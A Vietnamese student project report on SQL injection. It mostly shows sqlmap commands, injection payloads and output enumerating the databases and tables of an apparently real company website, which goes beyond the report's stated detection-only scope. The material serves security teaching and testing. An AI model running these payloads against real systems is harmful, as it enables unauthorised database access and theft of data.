Họ và tên: Phan Khánh Toàn MSSV: N12DCCN140 Lớp: D12CQMT01 AN TOÀN VÀ BẢO MẬT HỆ THỐNG THÔNG TIN – PROJECT2 I. Kỹ thuật tấn công SQL Injection 1. Tìm hiểu về SQL Injection SQL Injection là một kỹ thuật lợi dụng những lỗ hổng về câu truy vấn lấy dữ liệu của những website không an toàn trên web, đây là một kỹ thuật tấn công rất phổ biến và sự thành công của nó cũng tương đối cao. Một tấn công SQL Injection bao gồm chèn hoặc “tiêm” một phần hoặc một câu truy vấn SQL đầy đủ thông qua dữ liệu đầu vào hoặc được gửi từ client (trình duyệt) đến ứng dụng web. Tấn công SQL injection thành công có thể đọc dữ liệu nhạy cảm từ cơ sở dữ liệu, sửa đổi dữ liệu của cơ sở dữ liệu (thêm/ cập nhật/ xoá), thực thi quyền quản trị trên cơ sở dữ liệu (ví dụ như tắt hệ quản trị cơ sở dữ liệu - DBMS), lấy nội dung một file trên file hệ thống DBMS hoặc ghi file vào file hệ thống, và trong một số trường hợp ra lệnh cho hệ điều hành. SQL injection là một dạng dễ thực hiện, cho nên ai cũng có thể học cách để tấn công. Lỗi bắt nguồn từ mã nguồn của ứng dụng web chứ không phải từ cơ sở dữ liệu, vì vậy bất kì thành phần nào của ứng dụng web có thể tương tác với người dùng chứa các dữ liệu (ví dụ: form, url, cookie…) đều có thể trở thành mục tiêu để khai thác tấn công.
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Họ và tên: Phan Khánh Toàn
MSSV: N12DCCN140
Lớp: D12CQMT01
AN TOÀN VÀ BẢO MẬT HỆ THỐNG THÔNG TIN – PROJECT2
I. Kỹ thuật tấn công SQL Injection
1. Tìm hiểu về SQL Injection
SQL Injection là một kỹ thuật lợi dụng những lỗ hổng về câu truy vấn lấy dữ liệu của những website không an
toàn trên web, đây là một kỹ thuật tấn công rất phổ biến và sự thành công của nó cũng tương đối cao.
Một tấn công SQL Injection bao gồm chèn hoặc “tiêm” một phần hoặc một câu truy vấn SQL đầy đủ thông qua
dữ liệu đầu vào hoặc được gửi từ client (trình duyệt) đến ứng dụng web. Tấn công SQL injection thành công có
thể đọc dữ liệu nhạy cảm từ cơ sở dữ liệu, sửa đổi dữ liệu của cơ sở dữ liệu (thêm/ cập nhật/ xoá), thực thi
quyền quản trị trên cơ sở dữ liệu (ví dụ như tắt hệ quản trị cơ sở dữ liệu - DBMS), lấy nội dung một file trên file
hệ thống DBMS hoặc ghi file vào file hệ thống, và trong một số trường hợp ra lệnh cho hệ điều hành.
SQL injection là một dạng dễ thực hiện, cho nên ai cũng có thể học cách để tấn công. Lỗi bắt nguồn từ mã
nguồn của ứng dụng web chứ không phải từ cơ sở dữ liệu, vì vậy bất kì thành phần nào của ứng dụng web có
thể tương tác với người dùng chứa các dữ liệu (ví dụ: form, url, cookie…) đều có thể trở thành mục tiêu để khai
thác tấn công.
2. Kiểm tra lỗi SQL Injection
2.1. Mục đích: kiểm tra xem ứng dụng web của công ty Ân Nguyên có bị lỗi SQL Injection hay không. Từ đó
đưa ra cảnh báo hoặc giải pháp giúp công ty xây dựng một website an toàn.
2.2. Phạm vi: dự án chỉ kiểm tra để tìm ra lỗi của website, cam kết giữ bí mật và không sử dụng kết quả cho
mục đích xấu, không tiến hành khai thác lỗ hổng của website.
2.3. Kế hoạch: thực hiện kiểm tra từ 6/10/2015 đến 23/10/2015
2.4. Mục tiêu: website của công ty Ân Nguyên có địa chỉ web http://xxx.abc và cơ sở dữ liệu của website.
2.5. Hạn chế: phải kiểm tra sâu trong mã nguồn của website
26%
6%
13%
16%
8%
16%
5%
5%3%
2%
Top 10 web application vulnerability 2013
Cross-site Sripting
SQL Injection
Authentication & Authorization
Session Management
CSRF
Info Leakage
Web server version
Remote code execution
Web server configuration
Unauthorized directory access
2.6. Tóm tắt những phát hiện: phát hiện website bị lỗi SQL Injection thông qua phương thức GET với tham
số là “id”…
2.7. Tóm tắt cách giải quyết: kiểm tra chặt chẽ câu truy vấn SQL, loại bỏ thông số kỹ thuật trong response,
kiểm tra dữ liệu đầu vào, quản lý quyền xử lý dữ liệu của người dùng…
3. Cách phát hiện và giải quyết
3.1. Cách phát hiện
Sử dụng công cụ OWASP ZAP để tìm lỗ hổng trong ứng dụng web kết hợp với công cụ SQLMap để tự
động thực hiện kiểm lỗi SQL Injection. Trong trường hợp này, OWASP ZAP và SQLMap được cài đặt hệ
điều hành Kali-linux 2.0 chạy trên máy ảo VMware Workstation 12 Player.
1. Sử dụng công cụ OWASP ZAP, chúng ta nhập địa chỉ website vào để quét lỗ hổng. Sau khi quét,
chúng ta chọn 1 lỗ hổng để kiểm tra lỗi SQL Injection bằng công cụ SQLMap.
2. Thực hiện câu lệnh sau để liệt kê tên cơ sở dữ liệu sử dụng cho website: sqlmap -u "http://
http://xxx.abc/detail_faq.php?id=8" –dbs
root@kali:~# sqlmap -u "http://xxx.abc /detail_faq.php?id=8" –dbs
[*] starting at 14:54:42
[14:54:43] [INFO] testing connection to the target URL
[14:54:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
[14:54:44] [INFO] testing if the target URL is stable
[14:54:45] [INFO] target URL is stable
[14:54:45] [INFO] testing if GET parameter 'id' is dynamic
[14:54:45] [INFO] confirming that GET parameter 'id' is dynamic
[14:54:45] [INFO] GET parameter 'id' is dynamic
[14:54:45] [INFO] heuristics detected web page charset 'utf-8'
[14:54:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:54:46] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[14:55:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:55:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:55:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:55:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:55:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(EXTRACTVALUE)'
[14:55:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(EXTRACTVALUE)'
[14:55:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(UPDATEXML)'
[14:55:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:55:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT
UNSIGNED)'
[14:55:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[14:55:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:55:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[14:55:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[14:55:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[14:55:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:55:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[14:55:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[14:55:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[14:55:16] [INFO] testing 'MySQL inline queries'
[14:55:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[14:55:16] [WARNING] time-based comparison requires larger statistical model, please wait..
[14:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[14:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:55:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:55:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:55:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:55:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[14:55:29] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[14:55:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:55:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other
(potential) technique found
[14:55:29] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of
query columns. Automatically extending the range for current UNION query injection technique test
[14:55:31] [INFO] target URL appears to have 6 columns in query
[14:55:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 7484=7484
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ozkK)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-3166 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7162706b71,0x6e626f62594b68625243,0x717a767171),NULL, NULL-----
[14:55:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0.12
[14:55:51] [INFO] fetching database names
[14:55:51] [INFO] the SQL query used returns 4 entries
[14:55:52] [INFO] retrieved: information_schema
[14:55:52] [INFO] retrieved: annguyen_web
[14:55:52] [INFO] retrieved: nghenhinstore
[14:55:53] [INFO] retrieved: test
available databases [4]:
[*] annguyen_web
[*] information_schema
[*] nghenhinstore
[*] test
[14:55:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/annguyenco.com'
[*] shutting down at 14:55:53
3. Chọn CSDL có được ở bước trên (trường hợp này chọn CSDL annguyen_web), thực hiện câu lệnh sau để
liệt kê các bảng trong cơ sở dữ liệu đã chọn: sqlmap -u " http://xxx.abc/detail_faq.php?id=8" -D annguyen_web
--tables
root@kali:~# sqlmap -u " http://xxx.abc/detail_faq.php?id=8" -D annguyen_web –tables
[*] starting at 14:59:22
[14:59:22] [INFO] resuming back-end DBMS 'mysql'
[14:59:22] [INFO] testing connection to the target URL
[14:59:23] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 7484=7484
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ozkK)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-3166 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7162706b71,0x6e626f62594b68625243,0x717a767171),NULL, NULL-----
[14:59:23] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0.12
[14:59:23] [INFO] fetching tables for database: 'annguyen_web'
[14:59:24] [INFO] the SQL query used returns 590 entries
[14:59:24] [INFO] retrieved: account
[14:59:25] [INFO] retrieved: agency
[14:59:25] [INFO] retrieved: agent
[14:59:25] [INFO] retrieved: app_detail
[14:59:26] [INFO] retrieved: av_address
[14:59:26] [INFO] retrieved: av_attribute
[14:59:27] [INFO] retrieved: av_attribute_display
[14:59:27] [INFO] retrieved: av_attribute_group
[14:59:27] [INFO] retrieved: av_category
[14:59:28] [INFO] retrieved: av_category_description
[14:59:28] [INFO] retrieved: av_category_to_manufacturer
[14:59:29] [INFO] retrieved: av_chome
[14:59:29] [INFO] retrieved: av_chome_description
[14:59:30] [INFO] retrieved: av_cinformation
[14:59:30] [INFO] retrieved: av_cinformation_description
[14:59:30] [INFO] retrieved: av_cnews
[14:59:31] [INFO] retrieved: av_cnews_description
[14:59:31] [INFO] retrieved: av_color
[14:59:32] [INFO] retrieved: av_country
[14:59:32] [INFO] retrieved: av_coupon
[14:59:32] [INFO] retrieved: av_coupon_description
[14:59:33] [INFO] retrieved: av_coupon_product
[14:59:33] [INFO] retrieved: av_csupport
[14:59:34] [INFO] retrieved: av_csupport_description
[14:59:35] [INFO] retrieved: av_currency
[14:59:35] [INFO] retrieved: av_customer
[14:59:35] [INFO] retrieved: av_customer_group
[14:59:36] [INFO] retrieved: av_download
[14:59:36] [INFO] retrieved: av_download_description
[14:59:37] [INFO] retrieved: av_extension
[14:59:37] [INFO] retrieved: av_geo_zone
[14:59:38] [INFO] retrieved: av_history
[14:59:38] [INFO] retrieved: av_information
[14:59:39] [INFO] retrieved: av_information_description
[14:59:39] [INFO] retrieved: av_language
[14:59:39] [INFO] retrieved: av_lp_dunehd
[14:59:40] [INFO] retrieved: av_lp_order
[14:59:40] [INFO] retrieved: av_manufacturer
[14:59:41] [INFO] retrieved: av_manufacturer_description
[14:59:41] [INFO] retrieved: av_measurement_class
[14:59:41] [INFO] retrieved: av_measurement_rule
[14:59:42] [INFO] retrieved: av_news
[14:59:42] [INFO] retrieved: av_news_description
[14:59:43] [INFO] retrieved: av_news_to_cnews
[14:59:43] [INFO] retrieved: av_newsletter
[14:59:44] [INFO] retrieved: av_order
[14:59:44] [INFO] retrieved: av_order_history
[14:59:45] [INFO] retrieved: av_order_option
[14:59:45] [INFO] retrieved: av_order_product
[14:59:45] [INFO] retrieved: av_order_status
[14:59:46] [INFO] retrieved: av_order_total
[14:59:46] [INFO] retrieved: av_phanloai
[14:59:46] [INFO] retrieved: av_phanloai_info
[14:59:47] [INFO] retrieved: av_phanloai_to_category
[14:59:47] [INFO] retrieved: av_product
[14:59:48] [INFO] retrieved: av_product_attribute
[14:59:48] [INFO] retrieved: av_product_description
[14:59:49] [INFO] retrieved: av_product_discount
[14:59:49] [INFO] retrieved: av_product_image
[14:59:49] [INFO] retrieved: av_product_option
[14:59:50] [INFO] retrieved: av_product_option_description
[14:59:51] [INFO] retrieved: av_product_option_value
[14:59:51] [INFO] retrieved: av_product_option_value_description
[14:59:52] [INFO] retrieved: av_product_phukien
[14:59:52] [INFO] retrieved: av_product_related
[14:59:53] [INFO] retrieved: av_product_search_phanloai
[14:59:53] [INFO] retrieved: av_product_special
[14:59:53] [INFO] retrieved: av_product_to_category
[14:59:54] [INFO] retrieved: av_product_to_chome
[14:59:54] [INFO] retrieved: av_product_to_download
[14:59:55] [INFO] retrieved: av_product_to_phanloai
[14:59:55] [INFO] retrieved: av_product_video
[14:59:56] [INFO] retrieved: av_redirect_url
[14:59:56] [INFO] retrieved: av_review
[14:59:56] [INFO] retrieved: av_setting
[14:59:57] [INFO] retrieved: av_showroom
[14:59:57] [INFO] retrieved: av_slideshow
[14:59:58] [INFO] retrieved: av_slideshow_description
[14:59:58] [INFO] retrieved: av_stock_status
[14:59:58] [INFO] retrieved: av_support
[14:59:59] [INFO] retrieved: av_support_description
[14:59:59] [INFO] retrieved: av_tax_class
[15:00:00] [INFO] retrieved: av_tax_rate
[15:00:00] [INFO] retrieved: av_url_alias
[15:00:00] [INFO] retrieved: av_user
[15:00:01] [INFO] retrieved: av_user_group
[15:00:04] [INFO] heuristics detected web page charset 'ascii'
[15:00:05] [INFO] retrieved: av_weight_rule
[15:00:07] [INFO] retrieved: av_zone
[15:00:08] [INFO] retrieved: av_zone_to_geo_zone
[15:00:08] [INFO] retrieved: category_app
[15:00:09] [INFO] retrieved: chitietsanpham
[15:00:09] [INFO] retrieved: counter
[15:00:10] [INFO] retrieved: daily
[15:00:10] [INFO] retrieved: danhgia
[15:00:10] [INFO] retrieved: deals_address
[15:00:11] [INFO] retrieved: deals_affiliate
[15:00:11] [INFO] retrieved: deals_affiliate_transaction
[15:00:12] [INFO] retrieved: deals_attribute
[15:00:12] [INFO] retrieved: deals_attribute_description
[15:00:13] [INFO] retrieved: deals_attribute_group
[15:00:13] [INFO] retrieved: deals_attribute_group_description
[15:00:13] [INFO] retrieved: deals_banner
[15:00:14] [INFO] retrieved: deals_banner_image
[15:00:15] [INFO] retrieved: deals_banner_image_description
[15:00:15] [INFO] retrieved: deals_category
[15:00:15] [INFO] retrieved: deals_category_description
[15:00:16] [INFO] retrieved: deals_category_to_layout
[15:00:16] [INFO] retrieved: deals_category_to_store
[15:00:17] [INFO] retrieved: deals_country
[15:00:18] [INFO] retrieved: deals_coupon
[15:00:18] [INFO] retrieved: deals_coupon_history
[15:00:19] [INFO] retrieved: deals_coupon_product
[15:00:19] [INFO] retrieved: deals_currency
[15:00:19] [INFO] retrieved: deals_customer
[15:00:20] [INFO] retrieved: deals_customer_group
[15:00:20] [INFO] retrieved: deals_customer_ip
[15:00:21] [INFO] retrieved: deals_customer_ip_blacklist
[15:00:21] [INFO] retrieved: deals_customer_reward
[15:00:22] [INFO] retrieved: deals_customer_transaction
[15:00:22] [INFO] retrieved: deals_download
[15:00:22] [INFO] retrieved: deals_download_description
[15:00:23] [INFO] retrieved: deals_extension
[15:00:23] [INFO] retrieved: deals_geo_zone
[15:00:24] [INFO] retrieved: deals_information
[15:00:24] [INFO] retrieved: deals_information_description
[15:00:24] [INFO] retrieved: deals_information_to_layout
[15:00:25] [INFO] retrieved: deals_information_to_store
[15:00:25] [INFO] retrieved: deals_language
[15:00:26] [INFO] retrieved: deals_layout
[15:00:27] [INFO] retrieved: deals_layout_route
[15:00:27] [INFO] retrieved: deals_length_class
[15:00:28] [INFO] retrieved: deals_length_class_description
[15:00:29] [INFO] retrieved: deals_manufacturer
[15:00:29] [INFO] retrieved: deals_manufacturer_to_store
[15:00:30] [INFO] retrieved: deals_option
[15:00:30] [INFO] retrieved: deals_option_description
[15:00:31] [INFO] retrieved: deals_option_value
[15:00:31] [INFO] retrieved: deals_option_value_description
[15:00:31] [INFO] retrieved: deals_order
[15:00:32] [INFO] retrieved: deals_order_download
[15:00:32] [INFO] retrieved: deals_order_fraud
[15:00:33] [INFO] retrieved: deals_order_history
[15:00:33] [INFO] retrieved: deals_order_option
[15:00:34] [INFO] retrieved: deals_order_product
[15:00:37] [INFO] retrieved: deals_order_status
[15:00:37] [INFO] retrieved: deals_order_total
[15:00:40] [INFO] retrieved: deals_order_voucher
[15:00:41] [INFO] retrieved: deals_product
[15:00:41] [INFO] retrieved: deals_product_attribute
[15:00:41] [INFO] retrieved: deals_product_description
[15:00:42] [INFO] retrieved: deals_product_discount
[15:00:42] [INFO] retrieved: deals_product_image
[15:00:43] [INFO] retrieved: deals_product_option
[15:00:43] [INFO] retrieved: deals_product_option_value
[15:00:44] [INFO] retrieved: deals_product_related
[15:00:44] [INFO] retrieved: deals_product_reward
[15:00:44] [INFO] retrieved: deals_product_special
[15:00:45] [INFO] retrieved: deals_product_tag
[15:00:45] [INFO] retrieved: deals_product_to_category
[15:00:46] [INFO] retrieved: deals_product_to_download
[15:00:46] [INFO] retrieved: deals_product_to_layout
[15:00:47] [INFO] retrieved: deals_product_to_store
[15:00:47] [INFO] retrieved: deals_return
[15:00:47] [INFO] retrieved: deals_return_action
[15:00:48] [INFO] retrieved: deals_return_history
[15:00:48] [INFO] retrieved: deals_return_reason
[15:00:49] [INFO] retrieved: deals_return_status
[15:00:49] [INFO] retrieved: deals_review
[15:00:50] [INFO] retrieved: deals_setting
[15:00:50] [INFO] retrieved: deals_stock_status
[15:00:51] [INFO] retrieved: deals_store
[15:00:51] [INFO] retrieved: deals_tax_class
[15:00:52] [INFO] retrieved: deals_tax_rate
[15:00:52] [INFO] retrieved: deals_tax_rate_to_customer_group
[15:00:53] [INFO] retrieved: deals_tax_rule
[15:00:53] [INFO] retrieved: deals_url_alias
[15:00:53] [INFO] retrieved: deals_user
[15:00:54] [INFO] retrieved: deals_user_group
[15:00:54] [INFO] retrieved: deals_voucher
[15:00:55] [INFO] retrieved: deals_voucher_history
[15:00:55] [INFO] retrieved: deals_voucher_theme
[15:00:56] [INFO] retrieved: deals_voucher_theme_description
[15:00:56] [INFO] retrieved: deals_weight_class
[15:00:57] [INFO] retrieved: deals_weight_class_description
[15:00:57] [INFO] retrieved: deals_zone
[15:00:58] [INFO] retrieved: deals_zone_to_geo_zone
[15:00:58] [INFO] retrieved: dl_commentmeta
[15:00:58] [INFO] retrieved: dl_comments
[15:00:59] [INFO] retrieved: dl_links
[15:00:59] [INFO] retrieved: dl_options
[15:01:00] [INFO] retrieved: dl_postmeta
[15:01:00] [INFO] retrieved: dl_posts
[15:01:01] [INFO] retrieved: dl_term_relationships
[15:01:01] [INFO] retrieved: dl_term_taxonomy
[15:01:02] [INFO] retrieved: dl_terms
[15:01:02] [INFO] retrieved: dl_usermeta
[15:01:03] [INFO] retrieved: dl_users
[15:01:03] [INFO] retrieved: dl_woocommerce_attribute_taxonomies
[15:01:03] [INFO] retrieved: dl_woocommerce_downloadable_product_permissions
[15:01:04] [INFO] retrieved: dl_woocommerce_order_itemmeta
[15:01:04] [INFO] retrieved: dl_woocommerce_order_items
[15:01:08] [INFO] retrieved: dl_woocommerce_tax_rate_locations
[15:01:08] [INFO] retrieved: dl_woocommerce_tax_rates
[15:01:09] [INFO] retrieved: dl_woocommerce_termmeta
[15:01:09] [INFO] retrieved: doitac
[15:01:10] [INFO] retrieved: dondathang
[15:01:10] [INFO] retrieved: dondathang102
[15:01:10] [INFO] retrieved: dt_commentmeta
[15:01:11] [INFO] retrieved: dt_comments
[15:01:11] [INFO] retrieved: dt_layerslider
[15:01:12] [INFO] retrieved: dt_links
[15:01:12] [INFO] retrieved: dt_lockdowns
[15:01:13] [INFO] retrieved: dt_login_fails
[15:01:13] [INFO] retrieved: dt_options
[15:01:13] [INFO] retrieved: dt_postmeta
[15:01:14] [INFO] retrieved: dt_posts
[15:01:14] [INFO] retrieved: dt_revslider_css
[15:01:15] [INFO] retrieved: dt_revslider_layer_animations
[15:01:15] [INFO] retrieved: dt_revslider_settings
[15:01:16] [INFO] retrieved: dt_revslider_sliders
[15:01:16] [INFO] retrieved: dt_revslider_slides
[15:01:16] [INFO] retrieved: dt_term_relationships
[15:01:17] [INFO] retrieved: dt_term_taxonomy
[15:01:17] [INFO] retrieved: dt_terms
[15:01:18] [INFO] retrieved: dt_usermeta
[15:01:18] [INFO] retrieved: dt_users
[15:01:19] [INFO] retrieved: dt_yarpp_related_cache
[15:01:19] [INFO] retrieved: event
[15:01:19] [INFO] retrieved: faq
[15:01:20] [INFO] retrieved: faq_xtreamer
[15:01:21] [INFO] retrieved: hlz_commentmeta
[15:01:21] [INFO] retrieved: hlz_comments
[15:01:22] [INFO] retrieved: hlz_crumina_slider
[15:01:23] [INFO] retrieved: hlz_layerslider
[15:01:23] [INFO] retrieved: hlz_links
[15:01:23] [INFO] retrieved: hlz_options
[15:01:24] [INFO] retrieved: hlz_postmeta
[15:01:24] [INFO] retrieved: hlz_posts
[15:01:25] [INFO] retrieved: hlz_revslider_settings
[15:01:25] [INFO] retrieved: hlz_revslider_sliders
[15:01:25] [INFO] retrieved: hlz_revslider_slides
[15:01:26] [INFO] retrieved: hlz_term_relationships
[15:01:26] [INFO] retrieved: hlz_term_taxonomy
[15:01:27] [INFO] retrieved: hlz_terms
[15:01:27] [INFO] retrieved: hlz_usermeta
[15:01:28] [INFO] retrieved: hlz_users
[15:01:28] [INFO] retrieved: hlz_woocommerce_attribute_taxonomies
[15:01:28] [INFO] retrieved: hlz_woocommerce_downloadable_product_permissions
[15:01:29] [INFO] retrieved: hlz_woocommerce_order_itemmeta
[15:01:29] [INFO] retrieved: hlz_woocommerce_order_items
[15:01:30] [INFO] retrieved: hlz_woocommerce_tax_rate_locations
[15:01:30] [INFO] retrieved: hlz_woocommerce_tax_rates
[15:01:30] [INFO] retrieved: hlz_woocommerce_termmeta
[15:01:31] [INFO] retrieved: item
[15:01:31] [INFO] retrieved: jos_banner
[15:01:32] [INFO] retrieved: jos_bannerclient
[15:01:32] [INFO] retrieved: jos_bannertrack
[15:01:33] [INFO] retrieved: jos_c1_danhmuc
[15:01:33] [INFO] retrieved: jos_c1_file
[15:01:34] [INFO] retrieved: jos_c1_language
[15:01:34] [INFO] retrieved: jos_c1_property
[15:01:35] [INFO] retrieved: jos_c1_sanpham
[15:01:35] [INFO] retrieved: jos_categories
[15:01:35] [INFO] retrieved: jos_components
[15:01:36] [INFO] retrieved: jos_contact_details
[15:01:36] [INFO] retrieved: jos_content
[15:01:37] [INFO] retrieved: jos_content_frontpage
[15:01:37] [INFO] retrieved: jos_content_rating
[15:01:38] [INFO] retrieved: jos_core_acl_aro
[15:01:38] [INFO] retrieved: jos_core_acl_aro_groups
[15:01:38] [INFO] retrieved: jos_core_acl_aro_map
[15:01:39] [INFO] retrieved: jos_core_acl_aro_sections
[15:01:39] [INFO] retrieved: jos_core_acl_groups_aro_map
[15:01:40] [INFO] retrieved: jos_core_log_items
[15:01:40] [INFO] retrieved: jos_core_log_searches
[15:01:41] [INFO] retrieved: jos_dbcache
[15:01:41] [INFO] retrieved: jos_groups
[15:01:41] [INFO] retrieved: jos_jce_groups
[15:01:42] [INFO] retrieved: jos_jce_plugins
[15:01:42] [INFO] retrieved: jos_jf_content
[15:01:43] [INFO] retrieved: jos_jf_tableinfo
[15:01:43] [INFO] retrieved: jos_languages
[15:01:44] [INFO] retrieved: jos_menu
[15:01:44] [INFO] retrieved: jos_menu_types
[15:01:44] [INFO] retrieved: jos_messages
[15:01:45] [INFO] retrieved: jos_messages_cfg
[15:01:45] [INFO] retrieved: jos_migration_backlinks
[15:01:46] [INFO] retrieved: jos_modules
[15:01:46] [INFO] retrieved: jos_modules_menu
[15:01:47] [INFO] retrieved: jos_newsfeeds
[15:01:47] [INFO] retrieved: jos_plugins
[15:01:48] [INFO] retrieved: jos_poll_data
[15:01:48] [INFO] retrieved: jos_poll_date
[15:01:48] [INFO] retrieved: jos_poll_menu
[15:01:49] [INFO] retrieved: jos_polls
[15:01:49] [INFO] retrieved: jos_sections
[15:01:50] [INFO] retrieved: jos_session
[15:01:50] [INFO] retrieved: jos_stats_agents
[15:01:51] [INFO] retrieved: jos_templates_menu
[15:01:51] [INFO] retrieved: jos_users
[15:01:51] [INFO] retrieved: jos_v1_danhmuc
[15:01:52] [INFO] retrieved: jos_v1_sanpham
[15:01:52] [INFO] retrieved: jos_weblinks
[15:01:53] [INFO] retrieved: khuyenmai
[15:01:53] [INFO] retrieved: khuyenmai_new
[15:01:54] [INFO] retrieved: lienhe
[15:01:54] [INFO] retrieved: loaisp
[15:01:54] [INFO] retrieved: lp_dunehd
[15:01:55] [INFO] retrieved: point
[15:01:55] [INFO] retrieved: popcorn410
[15:01:56] [INFO] retrieved: profile
[15:01:56] [INFO] retrieved: qa_blobs
[15:01:56] [INFO] retrieved: qa_cache
[15:01:57] [INFO] retrieved: qa_categories
[15:01:57] [INFO] retrieved: qa_categorymetas
[15:01:58] [INFO] retrieved: qa_contentwords
[15:01:58] [INFO] retrieved: qa_cookies
[15:01:58] [INFO] retrieved: qa_iplimits
[15:01:59] [INFO] retrieved: qa_messages
[15:01:59] [INFO] retrieved: qa_options
[15:02:00] [INFO] retrieved: qa_pages
[15:02:00] [INFO] retrieved: qa_postmetas
[15:02:01] [INFO] retrieved: qa_posts
[15:02:01] [INFO] retrieved: qa_posttags
[15:02:02] [INFO] retrieved: qa_sharedevents
[15:02:02] [INFO] retrieved: qa_tagmetas
[15:02:03] [INFO] retrieved: qa_tagwords
[15:02:03] [INFO] retrieved: qa_titlewords
[15:02:03] [INFO] retrieved: qa_userevents
[15:02:04] [INFO] retrieved: qa_userfavorites
[15:02:04] [INFO] retrieved: qa_userfields
[15:02:08] [INFO] retrieved: qa_userlevels
[15:02:08] [INFO] retrieved: qa_userlimits
[15:02:09] [INFO] retrieved: qa_userlogins
[15:02:15] [INFO] retrieved: qa_usermetas
[15:02:16] [INFO] retrieved: qa_usernotices
[15:02:16] [INFO] retrieved: qa_userpoints
[15:02:16] [INFO] retrieved: qa_userprofile
[15:02:17] [INFO] retrieved: qa_users
[15:02:17] [INFO] retrieved: qa_uservotes
[15:02:18] [INFO] retrieved: qa_widgets
[15:02:18] [INFO] retrieved: qa_words
[15:02:18] [INFO] retrieved: shopsanpham
[15:02:19] [INFO] retrieved: softcommentmeta
[15:02:19] [INFO] retrieved: softcomments
[15:02:20] [INFO] retrieved: softlinks
[15:02:20] [INFO] retrieved: softoptions
[15:02:21] [INFO] retrieved: softpostmeta
[15:02:21] [INFO] retrieved: softposts
[15:02:22] [INFO] retrieved: softterm_relationships
[15:02:22] [INFO] retrieved: softterm_taxonomy
[15:02:23] [INFO] retrieved: softterms
[15:02:24] [INFO] retrieved: softusermeta
[15:02:24] [INFO] retrieved: softusers
[15:02:24] [INFO] retrieved: sukien
[15:02:25] [INFO] retrieved: tintuc
[15:02:25] [INFO] retrieved: tintuc_new
[15:02:26] [INFO] retrieved: ungdung
[15:02:26] [INFO] retrieved: user
[15:02:27] [INFO] retrieved: users
[15:02:27] [INFO] retrieved: wiki_archive
[15:02:27] [INFO] retrieved: wiki_category
[15:02:28] [INFO] retrieved: wiki_categorylinks
[15:02:28] [INFO] retrieved: wiki_change_tag
[15:02:29] [INFO] retrieved: wiki_externallinks
